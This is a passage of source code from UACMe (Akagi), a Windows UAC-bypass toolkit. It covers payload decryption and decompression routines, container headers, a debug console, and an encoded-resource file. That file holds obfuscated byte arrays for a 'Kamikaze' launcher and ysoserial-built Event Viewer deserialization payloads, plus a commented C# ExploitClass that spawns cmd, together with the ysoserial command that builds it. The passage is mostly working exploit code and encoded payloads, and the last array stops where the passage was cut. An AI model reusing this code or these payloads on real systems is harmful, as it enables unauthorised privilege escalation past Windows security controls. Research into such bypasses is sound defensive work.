_In_ ULONG cbBuffer,
_Out_ PULONG pcbDecompressed
)
{
BOOL bResult = FALSE;
ULONG FinalDecompressedSize = 0;
SIZE_T memIO;
PUCHAR UncompressedData = NULL;
PVOID Data = NULL;
PBYTE pbSecret = NULL;
DWORD cbSecret = 0, DataSize;
NTSTATUS status;
__try {
DataSize = cbBuffer;
do {
//
// Make a writeable buffer copy.
//
memIO = DataSize;
Data = supVirtualAlloc(
(PSIZE_T)&memIO,
DEFAULT_ALLOCATION_TYPE,
DEFAULT_PROTECT_TYPE,
&status);
if ((!NT_SUCCESS(status)) || (Data == NULL))
break;
supCopyMemory(Data, memIO, pbBuffer, DataSize);
//
// Get key for decryption.
//
pbSecret = (PBYTE)SelectSecretFromBlob(PayloadId, &cbSecret);
if ((pbSecret == NULL) || (cbSecret == 0))
break;
UncompressedData = (PUCHAR)DecompressContainerUnit(
(PBYTE)Data,
DataSize,
pbSecret,
cbSecret,
&FinalDecompressedSize);
if (UncompressedData == NULL)
break;
//
// Validate uncompressed data, skip for dotnet.
//
if (!supVerifyMappedImageMatchesChecksum(UncompressedData, FinalDecompressedSize)) {
if (!supIsCorImageFile(UncompressedData)) {
#ifdef _DEBUG
supDebugPrint(
TEXT("DecompressPayload"),
ERROR_DATA_CHECKSUM_ERROR);
#endif
break;
}
}
bResult = TRUE;
} while (FALSE);
}
__except (EXCEPTION_EXECUTE_HANDLER) {
bResult = FALSE;
}
if (pbSecret) supHeapFree(pbSecret);
if (Data) {
supVirtualFree(Data, NULL);
}
if (bResult == FALSE) {
if (UncompressedData != NULL) {
supVirtualFree(UncompressedData, NULL);
UncompressedData = NULL;
}
FinalDecompressedSize = 0;
}
if (pcbDecompressed)
*pcbDecompressed = FinalDecompressedSize;
return UncompressedData;
}
================================================
FILE: Source/Akagi/compress.h
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2022
*
* TITLE: COMPRESS.H
*
* VERSION: 3.61
*
* DATE: 22 Jun 2022
*
* Prototypes and definitions for compression.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
#include
#include
#include
#define UACME_CONTAINER_PACKED_UNIT 'UPCU' //Naka handling
#define UACME_CONTAINER_PACKED_DATA 'DPCU' //Naka handling
#define UACME_CONTAINER_PACKED_CODE 'CPCU' //Kuma handling
#define UACME_CONTAINER_PACKED_KEYS 'KPCU' //Kuma handling
//Initialization vector max bytes
#define DCU_IV_MAX_BLOCK_LENGTH 16
typedef struct _DCU_HEADER {
DWORD Magic;
DWORD cbData;
DWORD cbDeltaSize;
DWORD HeaderCrc;
BYTE bIV[DCU_IV_MAX_BLOCK_LENGTH];
//PBYTE pbData[1]; /* not a member of the structure */
} DCU_HEADER, *PDCU_HEADER;
typedef PVOID(*pfnDecompressPayload)(
_In_ ULONG PayloadId,
_In_ PVOID pbBuffer,
_In_ ULONG cbBuffer,
_Out_ PULONG pcbDecompressed);
PVOID DecompressPayload(
_In_ ULONG PayloadId,
_In_ PVOID pbBuffer,
_In_ ULONG cbBuffer,
_Out_ PULONG pcbDecompressed);
VOID EncodeBuffer(
_In_ PVOID Buffer,
_In_ ULONG BufferSize,
_In_ ULONG Key);
================================================
FILE: Source/Akagi/console.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2022 - 2026
*
* TITLE: CONSOLE.C
*
* VERSION: 3.69
*
* DATE: 12 Feb 2026
*
* Debug console.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
HANDLE StdOutputHandle = NULL;
pswprintf_s _swprintf_s = NULL;
VOID ConsolePrint(
_In_ LPCWSTR Message
)
{
WriteConsole(StdOutputHandle, Message, (ULONG)_strlen(Message), NULL, NULL);
}
VOID ConsolePrintValueUlong(
_In_ LPCWSTR Message,
_In_ ULONG Value,
_In_ BOOL Hexademical
)
{
WCHAR szText[200];
if (_swprintf_s) {
_swprintf_s(szText, RTL_NUMBER_OF(szText),
Hexademical ? TEXT("%ws 0x%lX\r\n") : TEXT("%ws %lu\r\n"),
Message,
Value);
ConsolePrint(szText);
}
}
VOID ConsolePrintStatus(
_In_ LPCWSTR Message,
_In_ NTSTATUS Status
)
{
ConsolePrintValueUlong(Message, Status, TRUE);
}
VOID ConsoleInit(
VOID
)
{
WCHAR szBuffer[100];
HMODULE hNtdll = GetModuleHandle(L"ntdll.dll");
if (hNtdll == NULL || !AllocConsole())
return;
_swprintf_s = (pswprintf_s)GetProcAddress(hNtdll, "swprintf_s");
if (_swprintf_s == NULL)
return;
StdOutputHandle = GetStdHandle(STD_OUTPUT_HANDLE);
SetConsoleMode(StdOutputHandle, ENABLE_PROCESSED_OUTPUT |
ENABLE_VIRTUAL_TERMINAL_PROCESSING);
_swprintf_s(szBuffer, RTL_NUMBER_OF(szBuffer), TEXT("[*] UACMe v%lu.%lu.%lu.%lu\r\n"),
UCM_VERSION_MAJOR,
UCM_VERSION_MINOR,
UCM_VERSION_REVISION,
UCM_VERSION_BUILD);
SetConsoleTitle(szBuffer);
}
BOOL ConsoleIsKeyPressed(
_In_ WORD VirtualKeyCode
)
{
BOOL bResult = FALSE;
DWORD numberOfEvents = 0;
INPUT_RECORD inp1;
HANDLE nStdHandle = GetStdHandle(STD_INPUT_HANDLE);
GetNumberOfConsoleInputEvents(nStdHandle, &numberOfEvents);
if (numberOfEvents) {
PeekConsoleInput(nStdHandle, &inp1, 1, &numberOfEvents);
bResult = (numberOfEvents != 0 &&
inp1.EventType == KEY_EVENT &&
inp1.Event.KeyEvent.bKeyDown &&
inp1.Event.KeyEvent.wVirtualKeyCode == VirtualKeyCode);
FlushConsoleInputBuffer(nStdHandle);
}
return bResult;
}
VOID ConsoleRelease(
VOID
)
{
DWORD dwStart = GetTickCount();
HANDLE nStdHandle = GetStdHandle(STD_INPUT_HANDLE);
if (nStdHandle == NULL || nStdHandle == INVALID_HANDLE_VALUE) {
FreeConsole();
return;
}
ConsolePrint(TEXT("[+] Press Enter to exit or wait few seconds and it will close automatically\r\n"));
FlushConsoleInputBuffer(nStdHandle);
while (!ConsoleIsKeyPressed(VK_RETURN) && (GetTickCount() - dwStart) < (10 * 1000))
Sleep(50);
FreeConsole();
}
================================================
FILE: Source/Akagi/console.h
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2022
*
* TITLE: CONSOLE.H
*
* VERSION: 3.62
*
* DATE: 08 Jul 2022
*
* Debug console header file.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
VOID ConsoleInit(
VOID);
VOID ConsoleRelease(
VOID);
VOID ConsolePrintStatus(
_In_ LPCWSTR Message,
_In_ NTSTATUS Status);
VOID ConsolePrint(
_In_ LPCWSTR Message);
VOID ConsolePrintValueUlong(
_In_ LPCWSTR Message,
_In_ ULONG Value,
_In_ BOOL Hexademical);
#ifdef _UCM_CONSOLE
#define ucmConsoleInit ConsoleInit
#define ucmConsoleRelease ConsoleRelease
#define ucmConsolePrintStatus ConsolePrintStatus
#define ucmConsolePrint ConsolePrint
#define ucmConsolePrintValueUlong ConsolePrintValueUlong
#else
#define ucmConsoleInit()
#define ucmConsoleRelease()
#define ucmConsolePrintStatus(Message, Status)
#define ucmConsolePrint(Message)
#define ucmConsolePrintValueUlong(Message, Value, Hexademical)
#endif
================================================
FILE: Source/Akagi/encresource.h
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016 - 2025
*
* TITLE: ENCRESOURCE.H
*
* VERSION: 3.68
*
* DATE: 07 Mar 2025
*
* Encoded string resources.
*
* 1) g_encodedKamikazeFinal - Kamikaze final stage launcher
* 2) string table elements
* 3) g_encodedRecentViews - eventvwr cache element generated with yososerial
* 4) g_encodedRecentViewsV2 - eventvwr cache element for dotnet2 generated with ysoserial
* 5) g_encodedTaskParamBegin, g_encodedTaskParamEnd - parameters data for the scheduler task
* 6) g_webviewvsinfo - WebView version info block
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
static const unsigned char g_encodedKamikazeFinal[121] = {
0x46, 0x9C, 0x9D, 0xBE, 0xCA, 0x73, 0xA6, 0x57, 0x04, 0xB2, 0xD4, 0x65, 0x8A, 0x1E, 0xB8, 0xC4,
0x04, 0xAA, 0xC1, 0x55, 0xB3, 0xD5, 0x2E, 0xD0, 0x19, 0xB8, 0xCC, 0x37, 0x99, 0x2A, 0xA6, 0xD8,
0x19, 0x81, 0x9D, 0xB6, 0xF5, 0x25, 0xFF, 0x59, 0x07, 0x95, 0xC2, 0x36, 0xDB, 0x0C, 0xB5, 0xD2,
0x45, 0xF8, 0x90, 0x1F, 0xB3, 0xC0, 0x2A, 0x90, 0x37, 0x8A, 0xC2, 0x28, 0xDC, 0x41, 0xBB, 0xC5,
0x1F, 0xD6, 0xC5, 0xF1, 0x83, 0x3E, 0xE3, 0x46, 0x1F, 0xB3, 0xC0, 0x3F, 0xC4, 0x04, 0xAD, 0xD3,
0x48, 0xF8, 0x99, 0x49, 0xF4, 0x81, 0x78, 0xE7, 0x0E, 0xA5, 0xD9, 0x34, 0xC5, 0x0A, 0xBA, 0x9F,
0x53, 0xCF, 0xD5, 0xFC, 0xD5, 0x2E, 0xE8, 0x5C, 0x1B, 0xA2, 0x93, 0x67, 0x99, 0x0F, 0xB4, 0xD2,
0x14, 0xE4, 0x89, 0x44, 0xBE, 0xD9, 0x37, 0xD9, 0x55
};
static const unsigned char g_encodedRecentViews[1411] = {
0x7A, 0xF5, 0xE9, 0xD3, 0xA7, 0xB0, 0x61, 0xC2, 0x85, 0xF5, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,
0x7A, 0xF8, 0xEB, 0xD3, 0xA7, 0x4F, 0xD0, 0x6E, 0x03, 0x87, 0x9D, 0xB6, 0xCA, 0x61, 0xDA, 0x5C,
0x0E, 0x95, 0xC5, 0xF3, 0xF1, 0x2A, 0xEC, 0x4E, 0x13, 0x9B, 0x87, 0xEE, 0x93, 0x61, 0xAE, 0x13,
0x4A, 0xDA, 0xD9, 0xFF, 0x87, 0x0C, 0xEB, 0x51, 0x0E, 0x81, 0x9B, 0xB6, 0x9A, 0x21, 0xFB, 0x48,
0x0E, 0x86, 0x88, 0xBF, 0x8B, 0x6F, 0xCE, 0x48, 0x18, 0x98, 0x80, 0xB0, 0xEC, 0x2A, 0xE7, 0x69,
0x15, 0x9F, 0x8C, 0xBD, 0x9A, 0x2D, 0xA9, 0x0A, 0x1B, 0xC1, 0x8A, 0xE6, 0x91, 0x7E, 0xA7, 0x0E,
0x4E, 0x91, 0xD9, 0xEB, 0x9E, 0x4A, 0x9F, 0x3D, 0x7A, 0xF4, 0xFA, 0x80, 0xDE, 0x3C, 0xEA, 0x58,
0x17, 0xDA, 0xAD, 0xB2, 0xD3, 0x2E, 0xB0, 0x79, 0x1B, 0x80, 0x88, 0x80, 0xC2, 0x3B, 0x94, 0x3D,
0x7A, 0xF4, 0xFF, 0x97, 0xC6, 0x3B, 0xFF, 0x6E, 0x1F, 0x80, 0xC7, 0x81, 0xC2, 0x22, 0xF1, 0x49,
0x13, 0x9A, 0x8E, 0x95, 0xC8, 0x3D, 0xF3, 0x5C, 0x0E, 0xE7, 0xAD, 0xB2, 0xD3, 0x2E, 0xCD, 0x58,
0x0E, 0xDA, 0xAD, 0xB2, 0xD3, 0x2E, 0xCD, 0x58, 0x0E, 0xBA, 0x88, 0xBE, 0xC2, 0x5E, 0xDA, 0x5C,
0x0E, 0x95, 0xBA, 0xB6, 0xD3, 0x61, 0xD0, 0x5C, 0x17, 0x91, 0x9A, 0xA3, 0xC6, 0x2C, 0xFB, 0x33,
0x3E, 0x95, 0x9D, 0xB2, 0xF4, 0x2A, 0xEA, 0x13, 0x2A, 0x86, 0x8C, 0xB5, 0xCE, 0x37, 0x8B, 0x79,
0x1B, 0x80, 0x88, 0x80, 0xC2, 0x3B, 0xB0, 0x7E, 0x1B, 0x87, 0x8C, 0x80, 0xC2, 0x21, 0xED, 0x54,
0x0E, 0x9D, 0x9F, 0xB6, 0xB5, 0x0B, 0xFF, 0x49, 0x1B, 0xA7, 0x8C, 0xA7, 0x89, 0x03, 0xF1, 0x5E,
0x1B, 0x98, 0x8C, 0x9F, 0xE4, 0x06, 0xDA, 0x27, 0x3E, 0x95, 0x9D, 0xB2, 0xF4, 0x2A, 0xEA, 0x13,
0x3F, 0x9A, 0x8F, 0xBC, 0xD5, 0x2C, 0xFB, 0x7E, 0x15, 0x9A, 0x9A, 0xA7, 0xD5, 0x2E, 0xF7, 0x53,
0x0E, 0x87, 0xF3, 0x97, 0xC6, 0x3B, 0xFF, 0x6E, 0x1F, 0x80, 0xC7, 0x96, 0xDF, 0x3B, 0xFB, 0x53,
0x1E, 0x91, 0x8D, 0x83, 0xD5, 0x20, 0xEE, 0x58, 0x08, 0x80, 0x80, 0xB6, 0xD4, 0x5B, 0xDA, 0x5C,
0x0E, 0x95, 0xBA, 0xB6, 0xD3, 0x61, 0xCA, 0x5C, 0x18, 0x98, 0x8C, 0xA0, 0x89, 0x0C, 0xF1, 0x48,
0x14, 0x80, 0xF9, 0x97, 0xC6, 0x3B, 0xFF, 0x6E, 0x1F, 0x80, 0xC7, 0x87, 0xC6, 0x2D, 0xF2, 0x58,
0x09, 0xAB, 0xD9, 0xD7, 0xA6, 0x4E, 0x9F, 0x3D, 0x7A, 0xF4, 0xEB, 0xD3, 0xA0, 0x50, 0xCD, 0x44,
0x09, 0x80, 0x8C, 0xBE, 0x89, 0x0B, 0xFF, 0x49, 0x1B, 0xDA, 0xBA, 0xB6, 0xD5, 0x26, 0xFF, 0x51,
0x13, 0x8E, 0x88, 0xA7, 0xCE, 0x20, 0xF0, 0x7B, 0x15, 0x86, 0x84, 0xB2, 0xD3, 0x4D, 0x9E, 0x3D,
0x7A, 0xF5, 0xE1, 0xD2, 0xAF, 0x4D, 0x9C, 0x3D, 0x7A, 0xF4, 0xEC, 0x2E, 0x58, 0xB0, 0x61, 0x22,
0x29, 0x8D, 0x9A, 0xA7, 0xC2, 0x22, 0xB0, 0x79, 0x1B, 0x80, 0x88, 0xFD, 0xF4, 0x2A, 0xEC, 0x54,
0x1B, 0x98, 0x80, 0xA9, 0xC6, 0x3B, 0xF7, 0x52, 0x14, 0xB2, 0x86, 0xA1, 0xCA, 0x2E, 0xEA, 0x3C,
0x7A, 0xF4, 0xE9, 0xD4, 0xD1, 0x2E, 0xF2, 0x48, 0x1F, 0xAB, 0xB6, 0xD3, 0xAF, 0x4D, 0x9E, 0x3D,
0x7A, 0xF5, 0xE9, 0xD3, 0xA7, 0x49, 0x9A, 0x3D, 0x7A, 0xF4, 0xE9, 0xDA, 0xA3, 0x4F, 0x9E, 0x3D,
0x73, 0xF0, 0xE9, 0xD3, 0xA7, 0x4F, 0x97, 0x39, 0x7A, 0xF4, 0xE9, 0xD9, 0xA6, 0x4F, 0x9E, 0x3D,
0x73, 0xF1, 0xE9, 0xD3, 0xA7, 0x40, 0x9B, 0x3D, 0x7A, 0xF4, 0x7A, 0xD0, 0xA7, 0x4F, 0x9C, 0x3D,
0x7B, 0xF4, 0xE9, 0xD3, 0x58, 0xB0, 0x61, 0xC2, 0x7B, 0xF4, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,
0x76, 0xF6, 0xE9, 0xD3, 0xA7, 0x11, 0xD3, 0x54, 0x19, 0x86, 0x86, 0xA0, 0xC8, 0x29, 0xEA, 0x13,
0x2A, 0x9B, 0x9E, 0xB6, 0xD5, 0x1C, 0xF6, 0x58, 0x16, 0x98, 0xC7, 0x96, 0xC3, 0x26, 0xEA, 0x52,
0x08, 0xD8, 0xC9, 0x85, 0xC2, 0x3D, 0xED, 0x54, 0x15, 0x9A, 0xD4, 0xE0, 0x89, 0x7F, 0xB0, 0x0D,
0x54, 0xC4, 0xC5, 0xF3, 0xE4, 0x3A, 0xF2, 0x49, 0x0F, 0x86, 0x8C, 0xEE, 0xC9, 0x2A, 0xEB, 0x49,
0x08, 0x95, 0x85, 0xFF, 0x87, 0x1F, 0xEB, 0x5F, 0x16, 0x9D, 0x8A, 0x98, 0xC2, 0x36, 0xCA, 0x52,
0x11, 0x91, 0x87, 0xEE, 0x94, 0x7E, 0xFC, 0x5B, 0x49, 0xCC, 0xDC, 0xE5, 0xC6, 0x2B, 0xAD, 0x0B,
0x4E, 0x91, 0xDA, 0xE6, 0xA2, 0x4E, 0x9E, 0x3D, 0x7A, 0xB6, 0xA4, 0xBA, 0xC4, 0x3D, 0xF1, 0x4E,
0x15, 0x92, 0x9D, 0xFD, 0xF1, 0x26, 0xED, 0x48, 0x1B, 0x98, 0xBA, 0xA7, 0xD2, 0x2B, 0xF7, 0x52,
0x54, 0xA0, 0x8C, 0xAB, 0xD3, 0x61, 0xD8, 0x52, 0x08, 0x99, 0x88, 0xA7, 0xD3, 0x26, 0xF0, 0x5A,
0x54, 0xA0, 0x8C, 0xAB, 0xD3, 0x09, 0xF1, 0x4F, 0x17, 0x95, 0x9D, 0xA7, 0xCE, 0x21, 0xF9, 0x6F,
0x0F, 0x9A, 0xB9, 0xA1, 0xC8, 0x3F, 0xFB, 0x4F, 0x0E, 0x9D, 0x8C, 0xA0, 0xA6, 0x4F, 0x9E, 0x3D,
0x75, 0xB2, 0x86, 0xA1, 0xC2, 0x28, 0xEC, 0x52, 0x0F, 0x9A, 0x8D, 0x91, 0xD5, 0x3A, 0xED, 0x55,
0x7B, 0xF6, 0xE9, 0xD3, 0xA7, 0x49, 0x9D, 0x3D, 0x7A, 0xF4, 0x5C, 0xD6, 0x9B, 0x70, 0xE6, 0x50,
0x16, 0xD4, 0x9F, 0xB6, 0xD5, 0x3C, 0xF7, 0x52, 0x14, 0xC9, 0xCB, 0xE2, 0x89, 0x7F, 0xBC, 0x1D,
0x1F, 0x9A, 0x8A, 0xBC, 0xC3, 0x26, 0xF0, 0x5A, 0x47, 0xD6, 0x9C, 0xA7, 0xC1, 0x62, 0xA6, 0x1F,
0x45, 0xCA, 0xE4, 0xD9, 0x9B, 0x00, 0xFC, 0x57, 0x1F, 0x97, 0x9D, 0x97, 0xC6, 0x3B, 0xFF, 0x6D,
0x08, 0x9B, 0x9F, 0xBA, 0xC3, 0x2A, 0xEC, 0x1D, 0x37, 0x91, 0x9D, 0xBB, 0xC8, 0x2B, 0xD0, 0x5C,
0x17, 0x91, 0xD4, 0xF1, 0xF4, 0x3B, 0xFF, 0x4F, 0x0E, 0xD6, 0xC9, 0x9A, 0xD4, 0x06, 0xF0, 0x54,
0x0E, 0x9D, 0x88, 0xBF, 0xEB, 0x20, 0xFF, 0x59, 0x3F, 0x9A, 0x88, 0xB1, 0xCB, 0x2A, 0xFA, 0x00,
0x58, 0xB2, 0x88, 0xBF, 0xD4, 0x2A, 0xBC, 0x1D, 0x02, 0x99, 0x85, 0xBD, 0xD4, 0x72, 0xBC, 0x55,
0x0E, 0x80, 0x99, 0xE9, 0x88, 0x60, 0xED, 0x5E, 0x12, 0x91, 0x84, 0xB2, 0xD4, 0x61, 0xF3, 0x54,
0x19, 0x86, 0x86, 0xA0, 0xC8, 0x29, 0xEA, 0x13, 0x19, 0x9B, 0x84, 0xFC, 0xD0, 0x26, 0xF0, 0x5B,
0x02, 0xDB, 0xDB, 0xE3, 0x97, 0x79, 0xB1, 0x45, 0x1B, 0x99, 0x85, 0xFC, 0xD7, 0x3D, 0xFB, 0x4E,
0x1F, 0x9A, 0x9D, 0xB2, 0xD3, 0x26, 0xF1, 0x53, 0x58, 0xD4, 0x91, 0xBE, 0xCB, 0x21, 0xED, 0x07,
0x09, 0x90, 0xD4, 0xF1, 0xC4, 0x23, 0xEC, 0x10, 0x14, 0x95, 0x84, 0xB6, 0xD4, 0x3F, 0xFF, 0x5E,
0x1F, 0xCE, 0xBA, 0xAA, 0xD4, 0x3B, 0xFB, 0x50, 0x54, 0xB0, 0x80, 0xB2, 0xC0, 0x21, 0xF1, 0x4E,
0x0E, 0x9D, 0x8A, 0xA0, 0x9C, 0x2E, 0xED, 0x4E, 0x1F, 0x99, 0x8B, 0xBF, 0xDE, 0x72, 0xCD, 0x44,
0x09, 0x80, 0x8C, 0xBE, 0x85, 0x6F, 0xE6, 0x50, 0x16, 0x9A, 0x9A, 0xE9, 0xDF, 0x72, 0xBC, 0x55,
0x0E, 0x80, 0x99, 0xE9, 0x88, 0x60, 0xED, 0x5E, 0x12, 0x91, 0x84, 0xB2, 0xD4, 0x61, 0xF3, 0x54,
0x19, 0x86, 0x86, 0xA0, 0xC8, 0x29, 0xEA, 0x13, 0x19, 0x9B, 0x84, 0xFC, 0xD0, 0x26, 0xF0, 0x5B,
0x02, 0xDB, 0xDB, 0xE3, 0x97, 0x79, 0xB1, 0x45, 0x1B, 0x99, 0x85, 0xF1, 0x99, 0x42, 0x94, 0x1D,
0x5A, 0xC8, 0xA6, 0xB1, 0xCD, 0x2A, 0xFD, 0x49, 0x3E, 0x95, 0x9D, 0xB2, 0xF7, 0x3D, 0xF1, 0x4B,
0x13, 0x90, 0x8C, 0xA1, 0x89, 0x00, 0xFC, 0x57, 0x1F, 0x97, 0x9D, 0x9A, 0xC9, 0x3C, 0xEA, 0x5C,
0x14, 0x97, 0x8C, 0xED, 0xAA, 0x45, 0xBE, 0x1D, 0x5A, 0xD4, 0xD5, 0xA0, 0xC3, 0x75, 0xCE, 0x4F,
0x15, 0x97, 0x8C, 0xA0, 0xD4, 0x71, 0x93, 0x37, 0x5A, 0xD4, 0xC9, 0xF3, 0x87, 0x6F, 0xA2, 0x4E,
0x1E, 0xCE, 0xB9, 0xA1, 0xC8, 0x2C, 0xFB, 0x4E, 0x09, 0xDA, 0xBA, 0xA7, 0xC6, 0x3D, 0xEA, 0x74,
0x14, 0x92, 0x86, 0xED, 0xAA, 0x45, 0xBE, 0x1D, 0x5A, 0xD4, 0xC9, 0xF3, 0x87, 0x6F, 0xA2, 0x4E,
0x1E, 0xCE, 0xB9, 0xA1, 0xC8, 0x2C, 0xFB, 0x4E, 0x09, 0xA7, 0x9D, 0xB2, 0xD5, 0x3B, 0xD7, 0x53,
0x1C, 0x9B, 0xC9, 0x92, 0xD5, 0x28, 0xEB, 0x50, 0x1F, 0x9A, 0x9D, 0xA0, 0x9A, 0x6D, 0xB1, 0x5E,
0x5A, 0xD1, 0x99, 0xB6, 0x94, 0x77, 0xA8, 0x18, 0x58, 0xD4, 0xBA, 0xA7, 0xC6, 0x21, 0xFA, 0x5C,
0x08, 0x90, 0xAC, 0xA1, 0xD5, 0x20, 0xEC, 0x78, 0x14, 0x97, 0x86, 0xB7, 0xCE, 0x21, 0xF9, 0x00,
0x58, 0x8F, 0x91, 0xE9, 0xE9, 0x3A, 0xF2, 0x51, 0x07, 0xD6, 0xC9, 0x80, 0xD3, 0x2E, 0xF0, 0x59,
0x1B, 0x86, 0x8D, 0x9C, 0xD2, 0x3B, 0xEE, 0x48, 0x0E, 0xB1, 0x87, 0xB0, 0xC8, 0x2B, 0xF7, 0x53,
0x1D, 0xC9, 0xCB, 0xA8, 0xDF, 0x75, 0xD0, 0x48, 0x16, 0x98, 0x94, 0xF1, 0x87, 0x1A, 0xED, 0x58,
0x08, 0xBA, 0x88, 0xBE, 0xC2, 0x72, 0xBC, 0x1F, 0x5A, 0xA4, 0x88, 0xA0, 0xD4, 0x38, 0xF1, 0x4F,
0x1E, 0xC9, 0xCB, 0xA8, 0xDF, 0x75, 0xD0, 0x48, 0x16, 0x98, 0x94, 0xF1, 0x87, 0x0B, 0xF1, 0x50,
0x1B, 0x9D, 0x87, 0xEE, 0x85, 0x6D, 0xBE, 0x71, 0x15, 0x95, 0x8D, 0x86, 0xD4, 0x2A, 0xEC, 0x6D,
0x08, 0x9B, 0x8F, 0xBA, 0xCB, 0x2A, 0xA3, 0x1F, 0x3C, 0x95, 0x85, 0xA0, 0xC2, 0x6D, 0xBE, 0x7B,
0x13, 0x98, 0x8C, 0x9D, 0xC6, 0x22, 0xFB, 0x00, 0x58, 0x97, 0x84, 0xB7, 0x85, 0x6F, 0xB1, 0x03,
0x77, 0xFE, 0xC9, 0xF3, 0x87, 0x6F, 0xBE, 0x1D, 0x46, 0xDB, 0x9A, 0xB7, 0x9D, 0x1F, 0xEC, 0x52,
0x19, 0x91, 0x9A, 0xA0, 0x89, 0x1C, 0xEA, 0x5C, 0x08, 0x80, 0xA0, 0xBD, 0xC1, 0x20, 0xA0, 0x30,
0x70, 0xD4, 0xC9, 0xF3, 0x87, 0x73, 0xB1, 0x4E, 0x1E, 0xCE, 0xB9, 0xA1, 0xC8, 0x2C, 0xFB, 0x4E,
0x09, 0xCA, 0xE4, 0xD9, 0x87, 0x6F, 0xA2, 0x12, 0x35, 0x96, 0x83, 0xB6, 0xC4, 0x3B, 0xDA, 0x5C,
0x0E, 0x95, 0xB9, 0xA1, 0xC8, 0x39, 0xF7, 0x59, 0x1F, 0x86, 0xC7, 0x9C, 0xC5, 0x25, 0xFB, 0x5E,
0x0E, 0xBD, 0x87, 0xA0, 0xD3, 0x2E, 0xF0, 0x5E, 0x1F, 0xCA, 0xE4, 0xD9, 0x9B, 0x60, 0xD1, 0x5F,
0x10, 0x91, 0x8A, 0xA7, 0xE3, 0x2E, 0xEA, 0x5C, 0x2A, 0x86, 0x86, 0xA5, 0xCE, 0x2B, 0xFB, 0x4F,
0x44, 0xFF, 0xE2
};
/*
// ExploitClass.dll
using System;
class ExploitClass
{
public ExploitClass()
{
System.Diagnostics.Process.Start("cmd", "/c " + Environment.GetEnvironmentVariable("pe386"));
}
}
ysoserial_frmv2.exe -o raw -f BinaryFormatter -g ActivitySurrogateSelectorFromFile -c .\ExploitClass.cs;System.dll > RecentViews
*/
static const unsigned char g_encodedRecentViewsV2[8427] = {
0x7A, 0xF5, 0xE9, 0xD3, 0xA7, 0xB0, 0x61, 0xC2, 0x85, 0xF5, 0xE9, 0xD3, 0xA7, 0x4F, 0x9E, 0x3D,
0x7A, 0xF8, 0xEB, 0xD3, 0xA7, 0x4F, 0xD0, 0x6E, 0x03, 0x87, 0x9D, 0xB6, 0xCA, 0x61, 0xDA, 0x5C,
0x0E, 0x95, 0xC5, 0xF3, 0xF1, 0x2A, 0xEC, 0x4E, 0x13, 0x9B, 0x87, 0xEE, 0x95, 0x61, 0xAE, 0x13,
0x4A, 0xDA, 0xD9, 0xFF, 0x87, 0x0C, 0xEB, 0x51, 0x0E, 0x81, 0x9B, 0xB6, 0x9A, 0x21, 0xFB, 0x48,
0x0E, 0x86, 0x88, 0xBF, 0x8B, 0x6F, 0xCE, 0x48, 0x18, 0x98, 0x80, 0xB0, 0xEC, 0x2A, 0xE7, 0x69,
0x15, 0x9F, 0x8C, 0xBD, 0x9A, 0x2D, 0xA9, 0x0A, 0x1B, 0xC1, 0x8A, 0xE6, 0x91, 0x7E, 0xA7, 0x0E,
0x4E, 0x91, 0xD9, 0xEB, 0x9E, 0x4A, 0x9F, 0x3D, 0x7A, 0xF4, 0xFA, 0x80, 0xDE, 0x3C, 0xEA, 0x58,
0x17, 0xDA, 0xAD, 0xB2, 0xD3, 0x2E, 0xB0, 0x79, 0x1B, 0x80, 0x88, 0x80, 0xC2, 0x3B, 0x94, 0x3D,
0x7A, 0xF4, 0xFF, 0x97, 0xC6, 0x3B, 0xFF, 0x6E, 0x1F, 0x80, 0xC7, 0x81, 0xC2, 0x22, 0xF1, 0x49,
0x13, 0x9A, 0x8E, 0x95, 0xC8, 0x3D, 0xF3, 0x5C, 0x0E, 0xE7, 0xAD, 0xB2, 0xD3, 0x2E, 0xCD, 0x58,
0x0E, 0xDA, 0xAD, 0xB2, 0xD3, 0x2E, 0xCD, 0x58, 0x0E, 0xBA, 0x88, 0xBE, 0xC2, 0x5E, 0xDA, 0x5C,
0x0E, 0x95, 0xBA, 0xB6, 0xD3, 0x61, 0xD0, 0x5C, 0x17, 0x91, 0x9A, 0xA3, 0xC6, 0x2C, 0xFB, 0x33,
0x3E, 0x95, 0x9D, 0xB2, 0xF4, 0x2A, 0xEA, 0x13, 0x2A, 0x86, 0x8C, 0xB5, 0xCE, 0x37, 0x8B, 0x79,
0x1B, 0x80, 0x88, 0x80, 0xC2, 0x3B, 0xB0, 0x7E, 0x1B, 0x87, 0x8C, 0x80, 0xC2, 0x21, 0xED, 0x54,
0x0E, 0x9D, 0x9F, 0xB6, 0xB5, 0x0B, 0xFF, 0x49, 0x1B, 0xA7, 0x8C, 0xA7, 0x89, 0x03, 0xF1, 0x5E,
0x1B, 0x98, 0x8C, 0x9F, 0xE4, 0x06, 0xDA, 0x27, 0x3E, 0x95, 0x9D, 0xB2, 0xF4, 0x2A, 0xEA, 0x13,
